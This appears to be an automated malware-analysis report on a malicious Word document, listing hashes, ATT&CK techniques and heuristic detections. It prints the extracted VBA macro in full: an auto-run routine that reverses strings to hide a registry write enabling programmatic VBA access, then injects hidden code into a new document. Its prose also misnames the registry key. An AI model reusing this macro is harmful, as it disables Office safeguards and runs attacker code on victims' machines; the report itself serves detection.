Office (OOXML) malware analysis — malicious · fda18c5bf84af315

MALICIOUS

Office (OOXML)

76.0 KB Created: 2021-05-05 08:29:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-05-23

MD5: 7ef395924e2e4f40fd15f4a8d09340f1 SHA-1: 415e859c6ea89744890ebd17d2d533c514795308 SHA-256: fda18c5bf84af31562823992ec4c1f132815f82728e7fbd62802925eac03d2c7

172 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1105 Ingress Tool Transfer

The sample contains VBA macros, specifically an AutoOpen macro, which is a common technique for initial execution in malicious documents. The script utilizes WScript.Shell to write a registry value to 'HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\AccessibilityBOM', likely for persistence or to enable further malicious activity. The script also constructs a registry path by concatenating strings and reversing parts of it, indicating an attempt to obfuscate its actions. While the full payload delivery mechanism is not explicitly detailed, the use of WScript.Shell and the creation of registry keys strongly suggest a downloader or dropper functionality.

Heuristics 7

VBA project inside OOXML medium 4 related findings OOXML_VBA

Document contains a VBA project — VBA macros present

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

Sub funcMainW(linkPtr)
With CreateObject("wscript.shell")
.RegWrite linkPtr, 1, "REG_DWORD"

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Sub iteratorLoad(linkLen As String)
Set convertABorder = CreateObject("word.application")
With convertABorder.Documents.Add.VBProject.VBComponents("ThisDocument").CodeModule

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Attribute VB_Name = "clearPaste"
Sub autoopen()
swapConstTrust
```
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
- http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
- http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	1883 bytes
SHA-256: `82a37e1210f1d8b93e0a842f23f719565c4e6cac27a4a8dd23102452e55962db`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{2FF3FBD0-896B-40B3-9DF4-8186983DAAD4}{1F465923-1202-4327-8D25-01569905E86F}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "clearPaste" Sub autoopen() swapConstTrust Dim listPointerVar As String listPointerVar = funcTableMem iteratorLoad listPointerVar End Sub Attribute VB_Name = "nextWTemp" Sub iteratorLoad(linkLen As String) Set convertABorder = CreateObject("word.application") With convertABorder.Documents.Add.VBProject.VBComponents("ThisDocument").CodeModule .AddFromString linkLen End With convertABorder.Visible = False convertABorder.Quit SaveChanges:=wdDoNotSaveChanges End Sub Attribute VB_Name = "constRequest" Function optionDatabase() As String optionDatabase = Application.Version End Function Sub funcMainW(linkPtr) With CreateObject("wscript.shell") .RegWrite linkPtr, 1, "REG_DWORD" End With End Sub Function textW(linkPtr) textW = "HKEY_CUR" & StrReverse("rawtfoS\RESU_TNER") & "e\Microsoft\Office\" End Function Function swapArgumentPtr(linkPtr) swapArgumentPtr = "\Word\Secur" & StrReverse("VsseccA\yti") & "BOM" End Function Sub swapConstTrust() linkPtr = textW("refArray") dataClear = optionDatabase textboxTrustRight = swapArgumentPtr("refArray") funcMainW linkPtr & dataClear & textboxTrustRight End Sub Function funcTableMem() funcTableMem = StrReverse(UserForm1.TextBox1) End Function
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	23552 bytes
SHA-256: `42857607a790c53925ca634e462743808c9bf080f90d595080563402b30db94b`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.